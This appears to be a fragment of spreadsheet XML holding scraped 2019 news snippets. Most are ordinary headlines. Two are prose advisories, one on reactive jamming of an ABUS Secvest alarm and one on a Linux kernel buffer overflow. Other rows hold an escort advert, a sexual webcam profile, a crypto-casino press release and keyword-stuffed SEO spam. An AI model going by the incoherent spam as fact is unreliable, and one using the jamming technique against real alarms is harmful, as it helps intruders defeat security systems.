    <t>Thomas Detert found out that the jamming detection of the ABUS alarm central does not detect short jamming signals that are shorter than normal ABUS RF messages. Thus, an attacker is able to perform a “reactive jamming” attack. The reactive jamming simply detects the start of a RF message sent by a component of the ABUS Secvest wireless alarm system, for instance a wireless motion detector (FUBW50000) or a remote control (FUBE50014 or FUBE50015), and overlays it with random data before the original RF message ends. Thereby, the receiver (alarm central) is not able to properly decode the original transmitted signal. This enables an attacker to suppress correctly received RF messages of the wireless alarm system in an unauthorized manner, for instance status messages sent by a detector indicating an intrusion. Version 3.01.01 is affected. Published at: July 27, 2019 at 06:38PM View on Packet Storm The post ABUS Secvest 3.01.01 Unchecked Message Transmission Error Condition appeared first on Secured Me.</t>
  </si>
  <si>
    <t>Three people are missing after entering the River Thames in sweltering temperatures. Read more? Click here</t>
  </si>
  <si>
    <t>Police said the clothing belonged to 45-year-old Bradley Prater, who was found alive and well about 3pm.</t>
  </si>
  <si>
    <t>Star Giant Jonathon Patton is back in full training but has not regained confidence in his reconstructed knee to attempt a return on the field.</t>
  </si>
  <si>
    <t>Gone are the days when you needed a secretary to handle dictations. While the old method certainly has its benefits, many of us will do just fine with an audio to text converter on our smartphones. We have curated a list with the best audio to text converters for Android, so stick around to see if one of these can earn a spot in your device. Gboard Evernote Speechnotes Speechtexter Otter Voice Meeting Notes Dragon Anywhere Android Authority The post 6 best audio to text converters for Android appeared first on Crosat - News from the entertainment and multimedia.</t>
  </si>
  <si>
    <t>Julianne Hough is becoming the breakout star of America’s Got Talent, Season 14. She won that spot during Judges Cuts if only because she was willing to try to be different, no matter how silly she came off while fooling around. In fact, this week, her look was a hair away from being a little too out there. Hough wore a wild wig. In fact, the wig was so wild as compared to her typically sleek ‘do that many viewers seemed to do a double take. After posting a picture of her fresh appearance, social media was buzzing. Instagram was particularly astounded, and not afraid to say so. After seeing Julianne’s new wig on her beautiful head, many opined about who they thought she resembled while wearing her locks that curly way. When Hough did a side-by-side comparison of her new look with Dolly Parton’s, her brother Derek said she actually resembled rocker Dee Snyder. Click here to continue and read more… The Inquisitr Julianne Hough Wigs Out Like Dolly Parton On ‘America’s Got Talent’ Season 14</t>
  </si>
  <si>
    <t>Jeff Krever</t>
  </si>
  <si>
    <t>Despite a price tag of over $11,000, Andrew Harris should be a top target in TSN CFL Fantasy presented by LeoVegas. Ben Kramer has this week's projections.</t>
  </si>
  <si>
    <t>In the Linux kernel before 4.1.4, a buffer overflow occurs when checking userspace params in drivers/media/dvb-frontends/cx24116.c. The maximum size for a DiSEqC command is 6, according to the userspace API. However, the code allows larger values such as 23. Published at: July 27, 2019 at 11:15PM View on NVD website The post New vulnerability on the NVD: CVE-2015-9289 appeared first on Secured Me.</t>
  </si>
  <si>
    <t>Arabic Croatian Dictionary – travel dictionary to translate Arabic to Croatian. Click on the list to show Arabic or Croatian synonyms to understand the broader use of the words. The learning games help to build vocabulary. View the history of words used in the game again clickable for synonyms. Ideal for travelers, business people or … Continue reading Arabic Croatian Dictionary →</t>
  </si>
  <si>
    <t>Being a manager who prepares meticulously for every game, it’s a safe bet Dundee United boss Robbie Neilson already knows his starting line-up for Saturday’s Championship opener against Inverness Caley Thistle.</t>
  </si>
  <si>
    <t>Helena Soderpalm</t>
  </si>
  <si>
    <t>A teenager has told A$AP Rocky's trial for assault in Sweden that he was thrown to the ground, and kicked and punched; the rapper has pleaded not guilty.</t>
  </si>
  <si>
    <t>Best Dentist in Halton Hills RSS Friendliest Dentist In Halton Hills Number 1 Dentist Near Halton Hills Ontario Kid Friendly Dental Clinic Near Halton Hills Equiniti is the UK’s leading provider of share registration services and associated investor schemes. We act as. Number 1 Dentist In Halton Hills Kitchener-Waterloo hosts women’s field lacrosse provincials – They had around 40 girls sign up last year and that number. Oshawa 1, U19 B: Kawartha, U19 C: Oshawa 3, U19 D: Beaches 3. Get address, phone number, hours, reviews, photos, geolocation and more for South Georgetown Dental Care – Dentist | 333 Mountainview Rd S, Halton Halton Hills Family Health Team Georgetown, Ontario. See Google profile, Hours, Phone, Website and more for this business. 3.0 Cybo Score. Halton Hills Family Health Team is working in General practitioners, Health and medical, Hospitals activities. Review on. Best Dental Clinic Near Halton Hills Best Dentists in Halton Hills, ON – Dentistry On Sinclair, Still Waters Dental Group, Downtown Georgetown Dental, Sunnyview Dental – Georgetown, King's Cove Family Dental, Pownall Janet, DDs – Still Waters Dental, Market Place Dental Centre, Mill. The World’s 15 Best Places to Retire on $1 Million – But you’ll need some knowledge of Spanish Friendliest Dental Clinic In Halton Hills Ontario See more of Halton Hills Denture Clinic on Facebook Log In Forgot account? or Create New Account Not Now Halton Hills Denture Clinic Dentist &amp; Dental Office in Georgetown, Ontario Open Now Community See All 25 people like this. See more of Halton Hills Denture Clinic on Facebook Log In Forgot account? or Create New Kid Friendly Dental Clinic In Halton Hills 为您提供与 pleasant 相关的域名和网站信息，帮助您从域名应用的角度更好的了解域名是如何被使用的，为您使用域名提供参考依据。 Cosmetic Dental Clinic Near Halton Hills Ontario 为您提供与 Oakville 相关的域名和网站.</t>
  </si>
  <si>
    <t>Fremantle coach Ross Lyon admits it’s been a “challenging” six weeks but is adamant the club is heading in the right direction.</t>
  </si>
  <si>
    <t>My Kinks: ,sph,cei,strapon,cbt,expose, sisy,humiliation,wors Webcam profile: Sensual and Seductive Mistressd Favourite sex position: facesitting What I do in my amateur show: Obeyed Slaves What I don’t like: Rude People Gallery</t>
  </si>
  <si>
    <t>Source: https://www.theverge.com/2019/7/26/8931784/t-mobile-sprint-merger-esim-justice-department-requirement-sim-card The T-Mobile-Sprint merger could mean the end of the physical SIM card Amelia Krales / The Verge The Department of Justice may have just done more to eliminate those little plastic SIM cards you have to use to get your phone to work on a wireless carrier than all of the efforts of Big Tech over the past four years. That’s because it is requiring Dish and T-Mobile to support eSIM technology as a condition of its merger approval. What may seem like a wonky side detail or extra technical requirement in a blockbuster merger approval announcement could end up changing not just how your phone gets online, but also (eventually) the way phones are built. It’s not going to happen overnight — the process will probably take years — but this small proviso in the merger approval could affect much more than who can sell wireless service in… Continue reading… Source: https://www.theverge.com/2019/7/26/8931784/t-mobile-sprint-merger-esim-justice-department-requirement-sim-card The post The T-Mobile-Sprint merger could mean the end of the physical SIM card appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Council Nears Vote on Downtown Church &amp; Market Project – Dr. Cary Birkitt, whose Loudoun Street dental office is near the proposed project. While a majority of the council. However, over the past four years, England have preferred to chase, and Morgan insisted that his team can still win batting. Best Dentist Near Vaughan Best Dentists in Thornhill, Vaughan, ON – David McDowell, DDS, Rosedale Family Dental Centre, Scherer Karen, DDS – Thornhill Village Dental, DH Smile Center Dentistry, Tappuni Dental, Marketplace Dentistry, Watergarden Dental, North York Dental. He had seen another world war since then, and the near-hopelessness of the human. It seems more likely that Vaughan. If New Plymouth’s new $2.9m coastal homes sparking international interest – What’s got three storeys, three bedrooms, spectacular seafront views and a near $3 million price tag. bedroom home on the. See what patients have to say about Dr. Vaughan Wright, DDS and compare ratings with nearby Dentistry Practitioners on Healthgrades. Dr Wright has been my dentist for many years and the reason I rate him so highly is because he truly deserves it. I moved a. Kid Friendly Dental Clinic In Vaughan Top Choice Pediatric Dental Clinic of 2019 in Vaughan Call Website 9983 Keele Street, Suite 202 Maple, ON L6A 1S8. Kid-friendly environment: video games, TV’s and movies in every room, wide selection of children’s books and activities Child and Parent. Children's Dentistry Vaughan For children’s dentistry in Vaughan, local patients can rely on the Mackenzie Treat your teeth right with a visit to the office of Keith E. Vaughan DDS in Yorktown, Virginia.We would like to welcome you to our dental practice, where we believe the way to practice comprehensive dentistry is with concern, clear and concise communication, and. He can likewise assist you to a sanitary strategy at home towards dental wellness. There are numerous indicate consider before you choose any dentist, nevertheless. First of all, you must discover a. By 2017, this figure was placed at around 528,000 – a near 90% increase. 2017 was considered a breakthrough. the 3D. Friendliest Dentist Near Vaughan Ontario Inland Empire’s retail vacancies are highest in the nation. Was it e-commerce or overbuilding? – Also, outlet malls in Ontario. friendly environment, and that’s the best that can be done when retail vacancies become an. Best Pediatric Dentists in Vaughan, ON – Woodbridge Kids Dentistry &amp; Orthodontics, Vaughan Children's Dentistry, Kids Dental Group. Yelp Find Serving Vaughan and the Following Cities Woodbridge, Richmond Hill, Markham, Mississauga, Nobleton, Kleinburg, Rexdale ON. Preferred Day of Week M T W Th F How did you hear about us? Comments/Questions Submit Find Us Online Viraj Vora DDS. The day the music (almost) died: Mud, sweat and beers at Latitude – Friday evening brought heavy downpours to Henham Park, near Southwold. a bit like going to the dentist for a filling and. Finding a dentist near me for a same day dental implants in Maple, Woodbridge and Vaughan? Contact our clinic, Mapleridge Dentistry for the best dental implants services in the area!. Dental implants have become the preferred option for many patients who want.</t>
  </si>
  <si>
    <t>Dan Coats is leaving office after clashing with President Trump on national security. Also, dozens of mourners 'killed by Boko Haram' at a funeral in north Nigeria. And Brazil miners kill tribal leader in Amazon land invasion.</t>
  </si>
  <si>
    <t>Italian filmmaker Luca Guadagnino is also in talks to produce the feature. See full article at Film-news.co.uk » The post Luca Guadagnino in talks to direct Lord of the Flies adaptation appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>This is a paid press release, which contains forward looking statements, and should be treated as advertising or promotional material. Bitcoin.com is not responsible for or liable for any content, accuracy or quality within the press release. Pbet has come up with a complete blockchain crypto-based gaming platform that will redefine the existing casino industry and lead to a fair, trusted, transparent, more secured and affordable casino ecosystem. Place, Date: The online casino industry has had a new promising launch recently. Titled “Pbet”, the latest gaming platform brings a new wave in the existing virtual casino space with its cutting-edge design and infrastructure. But, interestingly, Pbet is more than a simple online casino- it’s more of a revolution that aims to set in a new dawn in crypto space with its innovative full blockchain solution. Pbet is a blockchain crypto-based gaming platform which is aimed to create a convergence between brick and mortar and online gambling through its breakthrough Unified Gaming Platform. This Unified platform aims to combine all 3 into- Players, Casinos and Pbet- to create tailor-added value for each one of them. “We will partner with physical casinos and help them to offer online gaming to highly-valued players- yet at a fraction of regular acquisition cost of online players. We know many land-based casinos are apprehensive of expanding online given high fees and lack of specialized resources to operate online casino system. But our blockchain-based turn-key, zero fix fees, revenue sharing model will help physical casinos to expand online easily without worrying of high costs. We will also support them with specialized resources to operate online casino system”, stated a leading spokesperson from Pbet. “Our blockchain-based system assures crypto payments which mean lesser transaction fees, instant withdrawals and more savings for players compared to playing in regular online casinos.” Speaking further, he highlighted on benefits assured by Pbet’s blockchain crypto-based system for casinos and players- Fair ecosystem: Blockchain’s Decentralized technology is not controlled by an entity Increased Trust: Blockchain assures transparency of information and hence increased trust among Providers, Players, Platform and operator Privacy: Players won’t be needed to share personal data for payment accuracy Less Payment fees: Crypto-currencies allow for big savings compared to Fiat Faster Payment processing: Instant deposits and withdrawals Easy Portability: Safe way of moving funds for players between physical and online casinos. Pbet is also poised to revolutionize the reward system in casinos through its blockchain-based, consortium reward model that will be applicable in both physical casinos and their online versions. This next-gen reward model will that pools together hospitality and hotel loyalty programs along with gaming rewards and create limitless loyalty spending ecosystem which will be free from the typical barriers of existing casino reward systems. For more, please visit https://pbet.io/. Contact Email Address info@pbet.io This is a paid press release. Readers should do their own due diligence before taking any actions related to the promoted company or any of its affiliates or services. Bitcoin.com is not responsible, directly or indirectly, for any damage or loss caused or alleged to be caused by or in connection with the use of or reliance on any content, goods or services mentioned in the press release. Tags in this story Blockchain, Casino, casino system, Casinos, consortium, crypto, Funds, Gaming Platform, high fees, hospitality, hotel loyalty programs, Online, PBET, physical, players Bitcoin.com PR Bitcoin.com is your premier source for everything Bitcoin-related. We can help you buy bitcoins and choose a bitcoin wallet. You can also read the latest news, or engage with the community on our Bitcoin Forum. Please keep in mind that this is a commercial website that lists wallets, exchanges and other Bitcoin-related companies.</t>
  </si>
  <si>
    <t>"I have been left with no choice but to commence court action," Folau said in a statement on Thursday.</t>
  </si>
  <si>
    <t>The lowly position of the consumer has been graphically exposed.</t>
  </si>
  <si>
    <t>With Tom Jones performing at Slessor Gardens on Saturday, there will be a number of road restrictions and closures in place.</t>
  </si>
  <si>
    <t>Welcome to escorts in Street End SO32, covering the whole area of Hampshire. We have escorts serving the flats, homes and local hotels in Street End and the surrounding Hampshire areas. Street End Escort Hampshire Escort Services Street End Escorts - Girls Who Know How to Fulfill You in Hampshire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Street End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Street End escorts are women who receive hundreds of compliments from their men because of the type of services that they provide them. There are quite a lot of escorts in the area, but not all of them can deliver what they promise. When you hire a beautiful companion tonight, only go for the best one who will compliment your personality. Go for the best escort agency and finding the best escort would not be very difficult. She can perform for you, and she can wonderfully caress you. You can evaluate the services of these ladies and compare them to the services provided by other escorts to know where these wonderful ladies stand. Escorts in Street End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Street End,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Clementine Location: Street End (SO32 1) Nationality: Welsh Spoken Language: English, Bulgarian Age: 21 years old Weight: 51.8kg (114lb) (8st - 2lb) Height: 6 feet 2 inches (187.96cm) Dress Size: M Shoe Size: 37 Hair Leigh: Very Long Hair Color: Black Eye Color: Gray Breast: Natural Breast Size: B Pubic Hair: Shaved Completely Tattooed: No Piercings: No Smoking: No Drinking: No Availability Area: Street End Outcall: Hampshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Clementine Escort Name: Kara Location: Street End (SO32 1) Nationality: English Spoken Language: English, French Age: 26 years old Weight: 50.0kg (110lb) (7st - 12lb) Height: 5 feet 4 inches (162.56cm) Dress Size: M Shoe Size: 40 Hair Leigh: Short Hair Color: Chocolate Mauve Eye Color: Blue Breast: Natural Breast Size: C Pubic Hair: Shaved Completely Tattooed: Yes Piercings: No Smoking: No Drinking: Occasionally Availability Area: Street End Outcall: Hampshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Kara Escort Name: Simone Location: Street End (SO32 1) Nationality: British Spoken Language: English, Icelandic Age: 29 years old Weight: 64.1kg (141lb) (10st - 1lb) Height: 5 feet 8 inches (172.72cm) Dress Size: M Shoe Size: 41 Hair Leigh: Long Hair Color: Brunette Eye Color: Amber Breast: Natural Breast Size: F Pubic Hair: Shaved Mostly Tattooed: Yes Piercings: No Smoking: No Drinking: Occasionally Availability Area: Street End Outcall: Hampshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Simone Escort Name: Brandy Location: Street End (SO32 1) Nationality: American Spoken Language: English, Icelandic Age: 41 years old Weight: 68.6kg (151lb) (10st - 11lb) Height: 5 feet 7 inches (170.18cm) Dress Size: XXL Shoe Size: 41 Hair Leigh: Short Hair Color: Brown Eye Color: Blue Breast: Natural Breast Size: B Pubic Hair: Shaved Mostly Tattooed: No Piercings: Yes Smoking: No Drinking: Yes Availability Area: Street End Outcall: Hampshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Brandy Escort Name: Poppy Location: Street End (SO32 1) Nationality: Dominican Spoken Language: English, Arabic Age: 20 years old Weight: 49.1kg (108lb) (7st - 10lb) Height: 5 feet 6 inches (167.74cm) Dress Size: L Shoe Size: 39 Hair Leigh: Medium-Length Hair Color: Red Eye Color: Hazel Breast: Silicone Breast Size: DD Pubic Hair: Trimmed Tattooed: No Piercings: No Smoking: Occasionally Drinking: No Availability Area: Street End Outcall: Hampshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Poppy Escort Name: Tatum Location: Street End (SO32 1) Nationality: Jamaican Spoken Language: English, Czech Age: 20 years old Weight: 55.5kg (122lb) (8st - 10lb) Height: 5 feet 6 inches (167.74cm) Dress Size: XL Shoe Size: 39 Hair Leigh: Short Hair Color: Bronde Eye Color: Hazel Breast: Natural Breast Size: C Pubic Hair: Shaved Completely Tattooed: No Piercings: No Smoking: No Drinking: Yes Availability Area: Street End Outcall: Hampshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Tatum Escort Name: Shelby Location: Street End (SO32 1) Nationality: Scottish Spoken Language: English, Lithuanian Age: 23 years old Weight: 58.6kg (129lb) (9st - 3lb) Height: 5 feet 7 inches (170.18cm) Dress Size: M Shoe Size: 40 Hair Leigh: Short Hair Color: Brunette Eye Color: Blue Breast: Natural Breast Size: C Pubic Hair: Shaved Completely Tattooed: No Piercings: No Smoking: Occasionally Drinking: Occasionally Availability Area: Street End Outcall: Hampshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Shelby Street End Agency Escort, Street End Massage Escort, Street End Blonde Escort, Street End British Escort, Street End Erotic Escort, Street End Brazilian Escort, Street End Porn Escort, Street End French Escort, Street End Independent Escort, Street End Outcall Escort, Street End Walsh Escort, Street End Brunette Escort, Street End Black Escort, Street End Bisexual Escort, Street End Young Escort, Street End Female Escort, Street End Ebony Escort, Street End Teen Escort, Street End Indian Escort, Street End Spanish Escort, Street End Busty Escort, Street End Horny Escort, Street End Cheap Escort, Street End Best Escort, Street End Incall Escort, Street End Male Escort, Street End Indian Escort, Street End Mature Escort, Street End Gay Escort, Street End Asian Escort, Street End Irish Escort, Street End Scottish Escort, Street End Polish Escort, Street End Chinese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Street End appeared first on Escort Info UK.</t>
  </si>
  <si>
    <t>Muslim preacher Mohammed Junaid Thorne has been arrested for large-scale drug trafficking, after police allegedly seized drugs, firearms and cash in raids across south-west Sydney.</t>
  </si>
  <si>
    <t>Forbidden pleasures abound in this spectacular musical, starring a dazzling Karen Olivo as a doomed Parisian chanteuse. Source link</t>
  </si>
  <si>
    <t>crazy teens on senior trip in Mexico *PART 2* The post crazy teens on senior trip in Mexico *PART 2* appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>Russell MacMorran put his hand up at a meeting and ended up managing the “worst” team in Britain. Read more? Click here</t>
  </si>
  <si>
    <t>Patrick Wood</t>
  </si>
  <si>
    <t>Commuting times have soared across Australia and are leading people to consider quitting their jobs. But some occupations are hit harder than others.</t>
  </si>
  <si>
    <t>Tom Zaunmayr, Phoebe Pin and Josh Zimmerman</t>
  </si>
  <si>
    <t>Kyran O’Donnell will use information gathered from his trip to push for population-boosting policy</t>
  </si>
  <si>
    <t>As popular as they are here, Australia's gun laws remain a target for America's NRA, with the lobby group's new hardline president attacking them again.</t>
  </si>
  <si>
    <t>Elizabeth Knight</t>
  </si>
  <si>
    <t>Captive regulators and conflicted governments. Who is left to police the casinos</t>
  </si>
  <si>
    <t>The US President went all guns blazing on Friday as he denied Apple's request to avoid US tarifffs on China imports and threatened to tax French wine.</t>
  </si>
  <si>
    <t>Thousands of people gathered in Angus at the weekend to pay an emotional and poignant farewell to murdered oil worker Steven Donaldson.</t>
  </si>
  <si>
    <t>Lock them up. Via NY Post: The NYPD has busted three men, including a reputed Crips gang member on probation, in connection with the caught-on-video water-dousing of cops in Harlem and Brooklyn, law enforcement sources told The Post Wednesday. Gangbanger Courtney “Killer Court” Thompson, 28, of the Crips subset “Fresh Gangstas” surrendered Wednesday morning at […]</t>
  </si>
  <si>
    <t>Boris Johnson will march into 10 Downing Street as the UK’s new prime minister before appointing what he claims is a “cabinet for modern Britain”. Read more? Click here</t>
  </si>
  <si>
    <t>THOR 4 Love and Thunder stars Natalie Portman’s Jane Foster as the Mighty Thor, but is this story set in an alternate reality in the Marvel multiverse? See full article at Telegraph.co.uk » The post Thor 4 Love and Thunder theory: Natalie Portman sequel set in different MULTIVERSE reality appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>Stuart Layt</t>
  </si>
  <si>
    <t>Astronomers have identified a rocky planet and two gas planets orbiting a small star just 73 light years away, with hopes for more planets in the system.</t>
  </si>
  <si>
    <t>THE CHASE presenter Bradley Walsh lost his cool tonight when he quizzed the Chaser Shaun Wallace following a question about his favourite dessert. Daily Express :: TV and Radio Feed The Chase: Shaun Wallace silenced by Bradley Walsh after he erupts in outburst</t>
  </si>
  <si>
    <t>Consumer Credit Counseling Service | (888) 551-1270 Free Consumer Credit Counseling Service call (888) 551-1270 Credit Repair, Bankruptcy Counseling, Foreclosure Prevention, Student Loan Debt Consolidation, Car Repossessions and Wage Garnishment solutions, Debt Management. MI5 Chief Warns of Threat to U.K. From Russia, Islamic State Saturday 27 July 2019 10:01 AM UTC-05 | Tags: credit-counseling from https://firmadeabogadosmedellin.blogspot.com/p/baltimore-maryland-consumer-credit.html MI5 chief Andrew Parker warned of the continued threat of attacks on Britain from Russia and the Islamic State militant group in a rare speech outside the country on Monday. https://www.youtube.com/watch?v=pmgv0n8iHvk https://www.youtube.com/channel/UCVQ-SQHY9GjS-RA_7eqGVrQ/videos copyright © 2016 Privacy Policy Tags: credit-counseling</t>
  </si>
  <si>
    <t>Mike Dare threw for 201 yards for the Bearkats . He could push for the No. Thomas must be his usual bruising Cheap New Jerseys self outside of the numbers against the smaller cornerback, and if he can be successful creating separation, he could be due baseball jerseys cheap for a big game and Jerseys Supply an effort that could lead to victory. Fresh flowers will also up the luxe look for next to nothing. While a Week 9 return isn’t confirmed, the team would welcome Blair’s presence if he is healthy enough to play after losing MLB Baseball Jerseys several defensive linemen to injury this past week. You literally need no more information. Giolito was credited with the win after the game was called in the middle of the fifth Jerseys Supply inning. was waived by the 49ers on Monday, Matt Maiocco of NBC Sports Bay Area reports. Twitter raised its number of characters from 140 Basketball Jerseys Cheap to 280 in 2017. But as I’ve said a few times this offseason, it’s always better to be highly rated in these things than not, so Columbus fans should take it. This oasis in Tillamook County is tucked between a trifecta of natural sites -Cape Kiwanda State Natural Area, Bob Straub State NFL Jerseys Free Shipping Park, and Nestucca Bay National Wildlife Refuge. I think MLB Baseball Jerseys the more knowledge or athleticism you have, the better the athlete we can get, the better for us, said Bloom. Bring a large saucepan of salted water to a boil. Sansa Stark’s stuffed peaches 150ml fruit mince 50g pecan nuts shelled 100ml Sherry 2Tblsp melted butter 4 no. Nike 49ers #10 Jimmy Garoppolo Olive/Camo Women’s Stitched NFL Limited 2017 Salute to Service Jersey Price: $20.00 Catches are fastened with two screws, nike nfl jerseys china so replacing a damaged catch is simple. Ya-Sin had to do NFL Jerseys Free Shipping a lot to earn that in just a few months on campus. African World Cup Qualifier. If the flow from your kitchen or bathroom faucet isn’t what it used to be, the aerator is probably plugged. Doing so has helped me avoid throwing away money on interest, and that’s cash that’s instead gone into MLB Jerseys China savings. Alex Cora knows his starting pitchers did not execute to the best of their abilities in the Boston Red Sox’s opening series against the Seattle Mariners. Sending that player to a team that goes on to eliminate you from the Cheap Jerseys NFL playoffs twice in three years is salt in the wound. Cheap Jerseys NFL Typically you have one guy that can do this really well. Obi Okolie had 14 points for Brown. is getting looks as an outside receiver at the Z position in camp this offseason, Matt Barrows of The Athletic reports. Make It Routine. Japan #21 Sakai Home Soccer Country Jersey Price: $17.50 He is also the only Ranger who has skated in every game this season. Mtshali joined the ANC in 1961 and Cheap Dallas Stars Jerseys spent 30 years in exile. A one-year starter Basketball Jerseys Cheap for Jimbo Fisher this year at A&amp;M, Sternberger stands at 6, 250 pounds and is an impressive athlete for the position. What about arm length? Boyz II Men hit it on the head when they sang It’s So Hard To Say Goodbye To MLB Jerseys China Yesterday. Could they take a corner like Greedy Williams and offer some competition in the secondary for Todd Bowles? But really, it’s a question that also doesn’t need to be answered. He weighed around 220 pounds back then. http://prof-designs.com/?p=119 https://www.gundemakcaabat.com/?p=14885</t>
  </si>
  <si>
    <t>PROSTATE cancer is the most common cancer in men in the UK. About one in eight men will develop the disease at some point in their lives. A healthy diet and regular exercise may help to reduce the risk. A recent study suggests sticking to a certain diet may help reduce the risk of aggressive prostate cancer. Daily Express :: Health Feed Prostate cancer: Following this diet may help to prevent aggressive form of the disease</t>
  </si>
  <si>
    <t>Gary Mckie</t>
  </si>
  <si>
    <t>Thanks to some individual MPs and families within their constituencies raising the subject of access to Spinraza again in the commons, TreatSMA have met last week with those MPs to voice our concerns over the MAA for ineligible patients. URGENT…</t>
  </si>
  <si>
    <t>Australian shares advanced on Tuesday, with information technology stocks in particular rising ahead of some key tech earnings in the US later this week.</t>
  </si>
  <si>
    <t>The third major entry in the Gearbox loot series has been waiting for years, but the time for Borderlands 3 is almost here. The developers announced that the last important step in the development of the game is now over – the game has now won gold. There will be no more delay between you and the release date of Borderlands 3. Becoming gold traditionally means that the game has been finalized and sent to disk, although this distinction has become less important in the digital age. For a game like Borderlands, this usually means that developers have started working on the first patches and post-launch content. (It's 2019, no game is ever really complete.) This means that it is unlikely that you will see any additional delays for Borderlands 3. So if you are on the list of early users, now is the time to plan – and we have guides on the tree Zane Skills, A Moze Skills Tree, and an Amara Skills Tree to help you understand your versions in advance.</t>
  </si>
  <si>
    <t>US private equity firms are awash with cash and Brexit-bruised Britain looks like a tempting targetEven Cobham’s shareholders probably wouldn’t describe their company, founded 85 years ago by aviation pioneer Sir Alan Cobham, as the jewel in the crown of the UK defence and aerospace industry. The Dorset-based firm had to tap investors for cash in 2016 and 2017, each time for about £500m, to repair a balance sheet bruised by profits warnings. Related: US private equity group snaps up Cobham in £4bn deal Continue reading… Read More</t>
  </si>
  <si>
    <t>James Glenday And Mazoe Ford</t>
  </si>
  <si>
    <t>John Regan's mother received a message from her son's phone in February, but she thinks someone else may have sent it. Now police in the US capital are involved in the search for the 34-year-old.</t>
  </si>
  <si>
    <t>2 Days in Kyoto – Japan Solo Travel The post 2 Days in Kyoto – Japan Solo Travel appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>This is not just a matter for bleeding hearts. In responding to the siege there must be a balance between protecting society and promoting rehabilitation.</t>
  </si>
  <si>
    <t>Writer, actor and director James Sweeney said the impetus for “Straight Up,” his debut feature film, came from a sobering epiphany ― even though the final product is very much an “arthouse screwball” rom-com. “It started from a feeling of wanting to explore the improbability of finding your soul mate,” Sweeney, who is based in Los Angeles, told HuffPost. “And the more finicky you are, the lesser the odds.” HuffPost got a sneak peek at “Straight Up,” which is being shown at Outfest Los Angeles this week following its world premiere at San Francisco’s Frameline Film Festival last month, via the exclusive clip above. The scene introduces Todd (played by Sweeney), a neurotic gay man whose attempts at relationships with men leave him feeling unfulfilled. Todd bonds with Rory (Katie Findlay), an aspiring actress with her own set of insecurities. However, the friendship brings on an identity crisis of sorts as Todd begins to wonder if he’s only socially conditioned himself to be gay and can find happiness by dating a woman. Courtesy of James Sweeney “Straight Up” stars James Sweeney (left) and Katie Findlay. Though friends dismiss the idea as an example of Todd’s internalized homophobia, Rory agrees to pursue a romantic relationship with him ― though sex and other acts of physical intimacy are off the table. Things take a comical turn when Todd introduces Rory to his parents (Randall Park and Betsy Brandt), as seen in the above scene. Describing his cinematic voice as “dialogue-driven, balanced and whimsical ― but not for lack of heart,” Sweeney cites Joss Whedon and Bryan Fuller as artistic influences. He also sees “Straight Up” as a unique film in that its LGBTQ themes are “incidental.” “The genre and style are inherently atypical within the LGBTQ space,” he said. “And while there is a sexual identity crisis, shame is not the driving force — the sexuality spectrum is very much normalized.” And, ultimately, the filmmaker would like “Straight Up” to send a message of optimism to all audiences, regardless of their relationship status. “For anyone who feels alone or unlovable, I want to say chin up,” he said. “If there is hope for Todd and Rory, there is hope for you.” “Straight Up” screens at Outfest Los Angeles on July 23 and 24. Source link</t>
  </si>
  <si>
    <t>Portland and shooting guard CJ McCollum agreed to a three-year, $100 million extension. Source: Sports Business News</t>
  </si>
  <si>
    <t>F1’s audience has crashed by an average of 518,000 viewers per race on free to air TV in its home country of Britain this year according to official data. Source: Sports Business News</t>
  </si>
  <si>
    <t>The NHS has been accused of breaking promises amid claims it is still placing cancer patients on weakened chemotherapy drugs.</t>
  </si>
  <si>
    <t>The hardware giant's plan for a new store has been given the go-ahead by council.</t>
  </si>
  <si>
    <t>Police alleged man threatened service station staff with an axe.</t>
  </si>
  <si>
    <t>Are we going to see Wayne Hayes again? Let's hope so. I loved him. The campaign starts here to get...</t>
  </si>
  <si>
    <t>Daneka Hill</t>
  </si>
  <si>
    <t>A land management workshop on the Burrup Peninsula saw Yandeyarra and Murujuga rangers share ideas and create valuable connections.</t>
  </si>
  <si>
    <t>Malcolm Knox</t>
  </si>
  <si>
    <t>To raise an alarm was an objective of the Herald’s investigation into inflated participation numbers. The alarm has been heard.</t>
  </si>
  <si>
    <t>RIVERDALE viewers have been gripped by the complicated relationships built by Jughead Jones and Betty Cooper – but it looks like season four could put the couple in danger of splitting as Jughead makes leaves his girlfriend behind. Daily Express :: TV and Radio Feed</t>
  </si>
  <si>
    <t>Independent MP Andrew Wilkie said he had spoken to whistleblowers who told him Crown was referred to as "The Vatican" because of its special status in Victoria.</t>
  </si>
  <si>
    <t>The comeback of injured North Melbourne defender Majak Daw will take another step this weekend when he is expected to play his first full game at VFL level.</t>
  </si>
  <si>
    <t>DEMENTIA is an umbrella term for symptoms such as memory loss, confusion and personality change. There are a few early symptoms of dementia that could mean a person is at risk – what are they? Daily Express :: Health Feed Dementia symptoms: The early signs of the condition that should not be ignored</t>
  </si>
  <si>
    <t>According to some ‘breaking news’ in France, Newcastle have now agreed a £10m fee with PSG for left-back Stanley N’Soki. This comes from French outlet RMC, who claim that we have come to an agreement with PSG over a fee for the of 20-year-old, stating it is €11m (£10m) plus a 20% sell-on clause. Get French Football News (GFFN) state that ourselves and the player are still ‘some way off agreeing a contract’, but claim that ‘negotiations will continue in the coming hours’. So, it looks like we are now closing in on a new left back and our second signing of the summer, with N’Soki being a player we’ve been tracking for the past 2 years now. Let’s hope we get this one wrapped up ASAP, with us having just over 10 days to sign a winger, a back up striker and, ideally, a midfielder and right back too!</t>
  </si>
  <si>
